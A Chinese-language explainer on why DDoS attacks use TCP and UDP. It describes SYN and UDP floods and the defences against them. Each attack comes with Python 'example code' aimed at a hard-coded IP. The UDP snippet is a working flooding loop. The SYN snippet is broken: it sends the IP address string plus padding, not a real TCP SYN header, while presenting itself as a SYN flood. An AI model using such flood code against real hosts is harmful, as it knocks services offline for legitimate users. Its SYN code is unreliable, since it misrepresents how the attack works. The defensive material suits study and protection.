为什么 DDoS 攻击偏爱使用 TCP 和 UDP 包？

Distributed Denial of Service (DDoS) 攻击是指攻击者利用多个计算机系统或网络设备（通常是被恶意软件感染的计算机，被称为“僵尸网络”）来淹没目标服务器的资源，导致合法用户无法访问服务。TCP 和 UDP 是两种最常见的用于 DDoS 攻击的网络协议。

1. TCP 和 UDP 的特性

TCP (Transmission Control Protocol)

• 面向连接：在数据传输前需要建立连接。
• 可靠传输：提供错误检查、排序和重传机制。
• 资源消耗：由于需要三次握手建立连接，消耗更多资源。

UDP (User Datagram Protocol)

• 无连接：无需事先建立连接即可发送数据包。
• 不可靠传输：不保证数据包的顺序和完整性，也不进行重传。
• 低延迟：由于没有连接建立的过程，可以快速发送数据包。

2. TCP 攻击

TCP SYN 泛洪攻击

• 原理：攻击者向目标服务器发送大量未完成的 TCP 连接请求（SYN 包），服务器尝试建立连接并等待 ACK 包，但由于攻击者不回应 ACK，导致连接半打开。
• 影响：服务器资源被半打开的连接占用，无法处理新的合法连接请求。
• 示例代码:

  import socket
  
  target_ip = "123.45.67.89"
  target_port = 80
  
  # 创建原始套接字
  sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
  
  # 发送 SYN 数据包
  sock.sendto(b'\x10' + target_ip.encode() + b'\x00' * 20 + b'\x02', (target_ip, target_port))
  

3. UDP 攻击

UDP 泛洪攻击

• 原理：向目标服务器发送大量 UDP 数据包，占用服务器带宽和处理能力。
• 影响：服务器可能因处理过多的 UDP 数据包而变得不堪重负，导致合法用户的请求被延迟或丢失。
• 示例代码:

  import socket
  import random
  
  target_ip = "123.45.67.89"
  target_port = 80
  
  # 创建 UDP 套接字
  sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  
  for _ in range(1000):
      data = random._urandom(1024)
      sock.sendto(data, (target_ip, target_port))
  

4. 防御策略

TCP 攻击防御

• SYN Cookie：服务器使用 SYN Cookie 技术来验证连接请求的真实性。
• 防火墙规则：设置防火墙规则来阻止异常的连接请求。
• 负载均衡：使用负载均衡器分散流量，减少单个服务器的压力。

UDP 攻击防御

• 速率限制：限制每秒接收的 UDP 包数量。
• 异常流量检测：通过分析流量模式识别异常行为。
• 黑洞路由：将恶意流量导向不存在的网络地址。

5. 结论

TCP 和 UDP 攻击之所以成为 DDoS 攻击的首选，是因为它们可以高效地消耗服务器资源，且实施起来相对简单。为了有效防御这些攻击，需要采取多层次的安全措施，包括但不限于上述提到的技术。